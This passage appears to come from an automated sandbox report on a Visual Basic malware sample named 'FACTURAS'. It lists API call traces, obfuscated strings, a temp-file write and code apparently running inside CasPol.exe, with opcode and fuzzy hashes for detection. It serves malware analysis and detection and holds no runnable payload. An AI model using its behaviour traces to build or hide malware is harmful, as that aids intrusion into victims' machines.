__vbaFreeVarList.MSVBVM60(00000005,00000003,00000008,?,?,00008008,00008008,?,?), ref: 0041FEC2
__vbaVarDup.MSVBVM60 ref: 0041FEF6
#528.MSVBVM60(?,?), ref: 0041FF03
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041FF0C
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041FF16
__vbaStrCopy.MSVBVM60(?,?,?), ref: 0041FF26
__vbaFreeStr.MSVBVM60(?,?,?), ref: 0041FF2E
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041FF3D
__vbaNew2.MSVBVM60(00402D44,004223F0), ref: 0041FF58
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 0041FFBA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,000000C8), ref: 00420019
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,000000C8), ref: 00420041
#546.MSVBVM60(?), ref: 0042004A
__vbaVarMove.MSVBVM60(?), ref: 0042005B
__vbaFreeVar.MSVBVM60(?), ref: 00420063
__vbaNew2.MSVBVM60(00402D44,004223F0,?), ref: 0042007B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 004200DD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,00000140), ref: 0042013C
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,00000140), ref: 0042015E
#554.MSVBVM60 ref: 00420163
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402958,00000090), ref: 004201A1

Strings

Wickiups, xrefs: 0041FED9
userprofile, xrefs: 0041FE5B
EKSPROPRIATIONSFORRETNINGER, xrefs: 0041FE05

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$CheckHresult$Move$ListNew2$#528#546#554#574#617#667BstrChkstkCopy
String ID: EKSPROPRIATIONSFORRETNINGER$Wickiups$userprofile
API String ID: 3879572176-2473413249
Opcode ID: 0fc2fedb27963cd47a776e5663be3da4e72c06e501471585a9fd3d5b046025c2
Instruction ID: be31f4fdd39a4c97f810f30d0f3eda793f00d0cf2b229daf1530e70586788333
Opcode Fuzzy Hash: 0fc2fedb27963cd47a776e5663be3da4e72c06e501471585a9fd3d5b046025c2
Instruction Fuzzy Hash: 73B10771A00228AFDB20EF90DC45FEEB7B4BF04304F0445AAE509B71A1DBB95A89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041FB1A, Relevance: 57.9, APIs: 30, Strings: 3, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041FB38
__vbaStrCopy.MSVBVM60(?,?,?,?,00401396), ref: 0041FB70
#609.MSVBVM60(?,?,?,?,00401396), ref: 0041FB7C
#557.MSVBVM60(00000008), ref: 0041FB8F
__vbaFreeVar.MSVBVM60(00000008), ref: 0041FBA8
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 0041FBD7
#666.MSVBVM60(?,00000008,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 0041FBE4
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,?,00000008), ref: 0041FC03
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,?,00000008), ref: 0041FC09
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,?,00000008), ref: 0041FC13
__vbaFileOpen.MSVBVM60(00000020,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,00000008), ref: 0041FC1F
__vbaFreeStr.MSVBVM60(00000020,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,00000008), ref: 0041FC27
__vbaFreeVarList.MSVBVM60(00000003,00000008,?,?,00000020,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,?,00000008), ref: 0041FC3A
#670.MSVBVM60(?,?,?,?,00401396), ref: 0041FC4D
__vbaPut3.MSVBVM60(000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FC5A
__vbaFreeVar.MSVBVM60(000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FC62
__vbaFileClose.MSVBVM60(00000001,000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FC70
#527.MSVBVM60(Turtled,00000001,000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FC81
__vbaStrMove.MSVBVM60(Turtled,00000001,000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FC8B
__vbaStrCopy.MSVBVM60(Turtled,00000001,000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FC9B
__vbaFreeStr.MSVBVM60(Turtled,00000001,000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FCA3
__vbaOnError.MSVBVM60(000000FF,Turtled,00000001,000000FF,?,00000001,?,?,?,?,00401396), ref: 0041FCB1
__vbaVarDup.MSVBVM60 ref: 0041FCD1
#606.MSVBVM60(000000F7,00000001), ref: 0041FCDF
__vbaStrMove.MSVBVM60(000000F7,00000001), ref: 0041FCE9
__vbaStrCopy.MSVBVM60(000000F7,00000001), ref: 0041FCF9
__vbaFreeStr.MSVBVM60(000000F7,00000001), ref: 0041FD01
__vbaFreeVar.MSVBVM60(000000F7,00000001), ref: 0041FD09
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402958,00000128), ref: 0041FD4E
__vbaFreeStr.MSVBVM60(0041FDAF), ref: 0041FDA9

Strings

tmp, xrefs: 0041FBC3
Turtled, xrefs: 0041FC7C
\M9XgMRXaN30mgEl56ja236, xrefs: 0041FBE9

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$Move$Copy$File$#527#557#606#609#666#670CheckChkstkCloseErrorHresultListOpenPut3
String ID: Turtled$\M9XgMRXaN30mgEl56ja236$tmp
API String ID: 2486381916-2524811428
Opcode ID: 157cbad45e542fe91a6761dcfc4aa5d19feee70b6bc37dbd6e293d57ba4d5e1b
Instruction ID: f7bc1e11a1fb69ef982dce79c8c17b13ebc70ae086fc767ef643929e0427c024
Opcode Fuzzy Hash: 157cbad45e542fe91a6761dcfc4aa5d19feee70b6bc37dbd6e293d57ba4d5e1b
Instruction Fuzzy Hash: 3B613971D00208ABDB00EFA1D955BEEBBB8AF04308F10857AF515BB1E2DB795A49CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041D85F, Relevance: 54.4, APIs: 26, Strings: 5, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041D87B
__vbaStrCopy.MSVBVM60(?,?,?,?,00401396), ref: 0041D8A5
__vbaStrCopy.MSVBVM60(?,?,?,?,00401396), ref: 0041D8B5
#514.MSVBVM60(0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D8C2
__vbaStrMove.MSVBVM60(0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D8CC
__vbaStrCmp.MSVBVM60(Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D8D7
__vbaFreeStr.MSVBVM60(Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D8EA
#541.MSVBVM60(?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D904
__vbaStrVarMove.MSVBVM60(?,?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D90D
__vbaStrMove.MSVBVM60(?,?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D917
__vbaFreeVar.MSVBVM60(?,?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D91F
#537.MSVBVM60(000000F8,?,?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D929
__vbaStrMove.MSVBVM60(000000F8,?,?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D933
#523.MSVBVM60(00000000,000000F8,?,?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D939
__vbaStrMove.MSVBVM60(00000000,000000F8,?,?,6:6:6,Argumentspecifikations7,00000000,0041DF6F,00000059,?,?,?,?,00401396), ref: 0041D943
__vbaStrMove.MSVBVM60(000000BA,00000000,000000F8,?,?), ref: 0041D95D
#514.MSVBVM60(00000000,000000BA,00000000,000000F8,?,?), ref: 0041D963
__vbaStrMove.MSVBVM60(00000000,000000BA,00000000,000000F8,?,?), ref: 0041D96D
__vbaStrCopy.MSVBVM60(00000000,000000BA,00000000,000000F8,?,?), ref: 0041D97A
__vbaFreeStrList.MSVBVM60(00000004,0041DF6F,00000000,?,00000000,00000000,000000BA,00000000,000000F8,?,?), ref: 0041D991
#554.MSVBVM60(?,?,?,?,00401396), ref: 0041D999
#697.MSVBVM60(00000294,?,?,?,?,00401396), ref: 0041D9A3
__vbaStrMove.MSVBVM60(00000294,?,?,?,?,00401396), ref: 0041D9AD
__vbaFreeStr.MSVBVM60(0041D9FB,Argumentspecifikations7,00000000,0041DF6F,00000059), ref: 0041D9E5
__vbaFreeStr.MSVBVM60(0041D9FB,Argumentspecifikations7,00000000,0041DF6F,00000059), ref: 0041D9ED
__vbaFreeStr.MSVBVM60(0041D9FB,Argumentspecifikations7,00000000,0041DF6F,00000059), ref: 0041D9F5

Strings

6:6:6, xrefs: 0041D8FB
Argumentspecifikations7, xrefs: 0041D8D2
YtI, xrefs: 0041D9F2
tI, xrefs: 0041D9B2
misingenuity, xrefs: 0041D8AA

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Move$Free$Copy$#514$#523#537#541#554#697ChkstkList
String ID: 6:6:6$Argumentspecifikations7$YtI$misingenuity$tI
API String ID: 365784744-4043548477
Opcode ID: 3ec3f6750185edeac3e82093cfae1c87a376d150741a778a584dcb4f40998412
Instruction ID: 21e61328ffb2c9d77808a42d182e75319979b759cfffe2f6dde1e49f5261a2e9
Opcode Fuzzy Hash: 3ec3f6750185edeac3e82093cfae1c87a376d150741a778a584dcb4f40998412
Instruction Fuzzy Hash: AA410071900108ABCB00FBA5CD62EEE7774AF54708F54853EF502BB1E1DE399A45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041DB14, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041DB30
__vbaVarDup.MSVBVM60 ref: 0041DB68
#524.MSVBVM60(?,?), ref: 0041DB75
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,?), ref: 0041DB88
#712.MSVBVM60(kystliniernes,bombasine,00000000,?,?,00000001,000000FF,00000000,?,?), ref: 0041DB98
__vbaStrMove.MSVBVM60(kystliniernes,bombasine,00000000,?,?,00000001,000000FF,00000000,?,?), ref: 0041DBA2
__vbaStrCopy.MSVBVM60(kystliniernes,bombasine,00000000,?,?,00000001,000000FF,00000000,?,?), ref: 0041DBAF
__vbaFreeStrList.MSVBVM60(00000002,?,?,kystliniernes,bombasine,00000000,?,?,00000001,000000FF,00000000,?,?), ref: 0041DBBE
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00401396), ref: 0041DBD0
__vbaHresultCheckObj.MSVBVM60(00000000,00401238,00402958,000000CC), ref: 0041DC03

Strings

bombasine, xrefs: 0041DB8E
kystliniernes, xrefs: 0041DB93
Interpage, xrefs: 0041DB54

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$FreeList$#524#712CheckChkstkCopyHresultMove
String ID: Interpage$bombasine$kystliniernes
API String ID: 618982454-1576064046
Opcode ID: 4b7bad8fe5da4cf5b40be9b07913d5146003e66d3a156664da07939a24c2ea87
Instruction ID: d5bd6ed92dd3996f5a477f744a16af858393804ca444508ad559a81309d178f2
Opcode Fuzzy Hash: 4b7bad8fe5da4cf5b40be9b07913d5146003e66d3a156664da07939a24c2ea87
Instruction Fuzzy Hash: 99311CB1D00208BFDB00EF95CC46FDEBBB8AB04714F10852AF515BA1E1DBB896458B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA24, Relevance: 12.1, APIs: 8, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041DA40
__vbaHresultCheckObj.MSVBVM60(00000000,00401228,00402958,0000006C), ref: 0041DA89
#539.MSVBVM60(?,000000F1,000000B4,0000004C), ref: 0041DAA7
__vbaStrVarMove.MSVBVM60(?,?,000000F1,000000B4,0000004C), ref: 0041DAB0
__vbaStrMove.MSVBVM60(?,?,000000F1,000000B4,0000004C), ref: 0041DABA
__vbaStrCopy.MSVBVM60(?,?,000000F1,000000B4,0000004C), ref: 0041DAC7
__vbaFreeStr.MSVBVM60(?,?,000000F1,000000B4,0000004C), ref: 0041DACF
__vbaFreeVar.MSVBVM60(?,?,000000F1,000000B4,0000004C), ref: 0041DAD7

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$FreeMove$#539CheckChkstkCopyHresult
String ID:
API String ID: 650776751-0
Opcode ID: 5e920ef38ce66dec5c44c66ae8fc713f8ecd3dd4d8fe98e16d918be2900a290a
Instruction ID: 4abc8eda56edeec600c0a1a6dde69522d342d07e5f2e8bba58d99c84b58fff03
Opcode Fuzzy Hash: 5e920ef38ce66dec5c44c66ae8fc713f8ecd3dd4d8fe98e16d918be2900a290a
Instruction Fuzzy Hash: F7210371E40208AFDB00EFA5C856FDDBFB4AF08754F14842AF506BB1E1CBB995858B58

Uniqueness

Uniqueness Score: -1.00%

Function 0042020D, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 00420229
__vbaStrCopy.MSVBVM60(?,?,?,?,00401396), ref: 00420253
__vbaHresultCheckObj.MSVBVM60(00000000,00401338,00402958,000000A8), ref: 00420285
__vbaStrMove.MSVBVM60 ref: 004202A3
__vbaFreeStr.MSVBVM60(004202C9), ref: 004202BB
__vbaFreeStr.MSVBVM60(004202C9), ref: 004202C3

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$CheckChkstkCopyHresultMove
String ID:
API String ID: 1421114154-0
Opcode ID: 35ede378ceed68ec91170eecf531bef699392269e34ffe866bb2f51563c4929a
Instruction ID: 355fb60279d8f19361eea665e3a7ed9cb3406699ced1e51f619526db72a87191
Opcode Fuzzy Hash: 35ede378ceed68ec91170eecf531bef699392269e34ffe866bb2f51563c4929a
Instruction Fuzzy Hash: A9110370A00219EFCB00EF94D95AFEDBBB4BF18704F50846AF405B72A1D77999458B98

Uniqueness

Uniqueness Score: -1.00%

Function 00420D3B, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00420F12,?,?,00420C37,00000000,?,?,?), ref: 00420D41

Part of subcall function 00420E2A: __vbaChkstk.MSVBVM60(?,00420D59,?,?,00420F12,?,?,00420C37,00000000,?,?,?), ref: 00420E30

__vbaErrorOverflow.MSVBVM60(?,?,00420F12,?,?,00420C37,00000000,?,?,?), ref: 00420D7F
__vbaChkstk.MSVBVM60(?,0041D72C), ref: 00420D8A
#644.MSVBVM60(?,?,0041D72C), ref: 00420DB4

Part of subcall function 00420E91: __vbaChkstk.MSVBVM60(?,?,?,00420D59,?,?,00420F12,?,?,00420C37,00000000,?,?,?), ref: 00420E97

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Chkstk$#644ErrorOverflow
String ID:
API String ID: 436640012-0
Opcode ID: 2f4ff53383ec935e42d0731882e56748ee50094e4fee32641a625a2e9d3bc387
Instruction ID: 4f11a9a09a545f0d78c4ebc785adf61c7ad3ee6e355b3f05b25a2318d456f59f
Opcode Fuzzy Hash: 2f4ff53383ec935e42d0731882e56748ee50094e4fee32641a625a2e9d3bc387
Instruction Fuzzy Hash: 9601DF34701605B9CB24BB71AD0269D7B789F05744F50446BFA04EF272D6749982D75C

Uniqueness

Uniqueness Score: -1.00%

Function 00420F3C, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,?,?,?,?,00420D59,?,?,00420F12,?,?,00420C37,00000000,?,?,?), ref: 00420F42
__vbaI2I4.MSVBVM60(?,?,?,?,?,00420D59,?,?,00420F12,?,?,00420C37,00000000,?,?,?), ref: 00420F6E
__vbaI2I4.MSVBVM60(?,00000000,?,?,?,?,?,00420D59,?,?,00420F12,?,?,00420C37,00000000,?), ref: 00420F8E

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Chkstk
String ID:
API String ID: 2065706432-0
Opcode ID: fae711df732b7a88d7ac4454cdcb6b2b582d435faac1cd43dfafb5f7c10e9be9
Instruction ID: 9c07cafcc63b710958112b52d71418ce7e2bc0d7fd3ef08fbe5a3cf741cecfc0
Opcode Fuzzy Hash: fae711df732b7a88d7ac4454cdcb6b2b582d435faac1cd43dfafb5f7c10e9be9
Instruction Fuzzy Hash: 3FF0A7312005086BDF14EB69CC43B5E37F59F00754F10823AB954DB3A1CA7CE910971C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exe PID: 5196 Parent PID: 6316 CasPol.exeCOMMON

Execution Graph

Execution Coverage:	8%
Dynamic/Decrypted Code Coverage:	95%
Signature Coverage:	0%
Total number of Nodes:	60
Total number of Limit Nodes:	4

Executed Functions

Function 1DED46C4, Relevance: 2.8, Strings: 2, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

lM$ , xrefs: 1DED6D9F
lM$ , xrefs: 1DED6C28

Memory Dump Source

Source File: 00000006.00000002.22646006933.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1ded0000_CasPol.jbxd

Similarity

API ID:
String ID: lM$ $lM$
API String ID: 0-636335897
Opcode ID: e668a3e13a8d5485b9675564381ff2341308f5ce790f23ba0505733126de04d7
Instruction ID: b091c3c94cd3419a3a50aa8baba1a6966a85fd2feac0fcb85e9b367a3114230d
Opcode Fuzzy Hash: e668a3e13a8d5485b9675564381ff2341308f5ce790f23ba0505733126de04d7
Instruction Fuzzy Hash: EDA18D34E047199FCB04DBA4C8949DDF7BAFF89304F128619E515AB2A1DF30A846CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1DED6AF1, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

lM$ , xrefs: 1DED6C28

Memory Dump Source

Source File: 00000006.00000002.22646006933.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1ded0000_CasPol.jbxd

Similarity

API ID:
String ID: lM$
API String ID: 0-3799009370
Opcode ID: 784ff1a8f4bb9f931f2854a1626cdf559150d3503378a0539833992318b0803d
Instruction ID: 6f481ea3a33dc67c6754598503e3ac3100ae276c51631977197ca0fc78082674
Opcode Fuzzy Hash: 784ff1a8f4bb9f931f2854a1626cdf559150d3503378a0539833992318b0803d
Instruction Fuzzy Hash: CA918D35E047199FCB05DFA0C8848DDFBBAFF89304B168619E506AB2A1DF30A846CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1DED5E08, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22646006933.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1ded0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67413ac304104a9f3f29482d865c32cf9b163e4b5fef8d34aa034cf6b21a8d12
Instruction ID: f0cb9cba01c727e5ed8fecc656d8b9771789fab2d04210f31d13b0a751a5c578
Opcode Fuzzy Hash: 67413ac304104a9f3f29482d865c32cf9b163e4b5fef8d34aa034cf6b21a8d12
Instruction Fuzzy Hash: 7D129FF0409B458AE3119F69CD4C199FBB1F745328B56C21AC2611A2F6DBBD024BEF64

Uniqueness

Uniqueness Score: -1.00%

Function 00B24320, Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6bcc7270555f22d2ea0b26709cdab899431053c7d75bf8b9c8002f66b0b9df7
Instruction ID: 5c799b14897a4aaf2e37ebcefac3110e7524d286c0b55f8e8adfc6a6ebd0d1f7
Opcode Fuzzy Hash: a6bcc7270555f22d2ea0b26709cdab899431053c7d75bf8b9c8002f66b0b9df7
Instruction Fuzzy Hash: 04B17D70E002298FDF10CFA9E88579EBBF2EF89314F148569D819E7794EB749845CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B21130, Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 103ba6927ec40d07bef0210815116c1697fcf03781f5b99f79a1438ca1c5478b
Instruction ID: cc5a32504e341180070a943c4852a1e11e76e3689c12986c22cc90e03c891a34
Opcode Fuzzy Hash: 103ba6927ec40d07bef0210815116c1697fcf03781f5b99f79a1438ca1c5478b
Instruction Fuzzy Hash: B0818235B042289BDB08DFB89494ABE77B7BFD8300B15896EE506E7284DE34DC029795

Uniqueness

Uniqueness Score: -1.00%

Function 00E27A1F, Relevance: 1.7, APIs: 1, Instructions: 212
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(-34A3F2D7,0F78F34F), ref: 00E27C36

Memory Dump Source

Source File: 00000006.00000002.22636564268.0000000000E27000.00000040.00000001.sdmp, Offset: 00E27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e27000_CasPol.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 7196a38d98a8ef0ce2c5c2138afccedd6c3c030b8ba8186a58aea00b5d1865a2
Instruction ID: 211aeed3cbdfc551eb9fb6987d11bc7ce08f5a256d9845670c81d32b963d35d3
Opcode Fuzzy Hash: 7196a38d98a8ef0ce2c5c2138afccedd6c3c030b8ba8186a58aea00b5d1865a2
Instruction Fuzzy Hash: 5F4138306583618FEF308F24D9D5BD573E2BF51324F5591AACC985B295D33489C6C705

Uniqueness

Uniqueness Score: -1.00%

Function 1DED4600, Relevance: 1.7, APIs: 1, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DED690A

Memory Dump Source

Source File: 00000006.00000002.22646006933.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1ded0000_CasPol.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7a2f132d73f01ac46896b3bb6acaeb8678d613d2239d6e85a230be2cbcc47f83
Instruction ID: 7a6fb142e723c08a595715e32f2d5530a167e6a96550b72df835b414c307aea7
Opcode Fuzzy Hash: 7a2f132d73f01ac46896b3bb6acaeb8678d613d2239d6e85a230be2cbcc47f83
Instruction Fuzzy Hash: 65516AB1C043499FCB01CFAAC890ACEBFF5BF49314F25815AE444AB252DB349889CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1DED67ED, Relevance: 1.6, APIs: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DED690A

Memory Dump Source

Source File: 00000006.00000002.22646006933.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1ded0000_CasPol.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 497b7116c36b76ba43141e4b6b93899e0d5773d6d9efe9343fa8115d19023cb9
Instruction ID: 191af50f7fea54095d790febcb657a7585953ac9d3757e089860124c2cdbff94
Opcode Fuzzy Hash: 497b7116c36b76ba43141e4b6b93899e0d5773d6d9efe9343fa8115d19023cb9
Instruction Fuzzy Hash: C551D0B1D103099FDF14CF99C884ADEBBB5FF48314F24812AE819AB210DB74A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E27B5A, Relevance: 1.6, APIs: 1, Instructions: 121
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(-34A3F2D7,0F78F34F), ref: 00E27C36

Memory Dump Source

Source File: 00000006.00000002.22636564268.0000000000E27000.00000040.00000001.sdmp, Offset: 00E27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e27000_CasPol.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: eaa6e91994777c983e6d49046d79bcbb427ce7cb57d38693df12dac3314efe3d
Instruction ID: 23888774cf22e2603cb318a7cd849503c38fdd6d4f0c4f7c50bc6871fe51bed2
Opcode Fuzzy Hash: eaa6e91994777c983e6d49046d79bcbb427ce7cb57d38693df12dac3314efe3d
Instruction Fuzzy Hash: 0D418E3064C702CBE708CF25E49C761F3B6EFA1720F65829EE8A459892DFB595B8D704

Uniqueness

Uniqueness Score: -1.00%

Function 1DED4674, Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DED690A

Memory Dump Source

